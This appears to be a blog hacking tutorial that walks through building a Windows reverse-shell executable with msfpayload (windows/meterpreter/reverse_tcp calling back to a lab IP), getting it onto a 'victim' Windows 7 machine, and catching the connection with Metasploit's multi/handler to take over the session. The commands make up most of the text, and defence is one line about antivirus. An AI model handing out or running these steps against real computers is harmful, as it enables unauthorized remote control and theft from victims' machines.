Level : Easy

As I have already wrote on my previous post about how to add a user with administrator
rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an
exploit for Windows 7 and all Windows.

Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today
tutorial I wrote everything about simple and easy to use

The tutorial today we will learn how to create a simple exploit (easy to create and easy to
implement ) and how we connect to Windows 7 victim that already executed our simple
exploit…simple isn’t it?

Okay let’s start the tutorial.

Requirements :
1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)

Step by Step :
FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console
and type the following command :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe

The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.

2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can
videw the tutorial how to share folder in your Backtrack (view tutorial here).

3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created
before. Open your Metasploit console, see the picture and type the following command :
 Information :

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler

4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was
the screenshot of my handler when Windows 7 executed the simple exploit :

I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i
<session_id>. From there you can do other command as you want.

Yes we’re inside the Windows 7 now

Countermeasures :
1. Install 3rd party firewall and antivirus that always updated.

Hope it’s useful

FYI : There’s still another tutorial I will post later about Hacking Remote Desktop. You can subscribe to get the tutorial by click the button below
and provide your e-mail address :

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail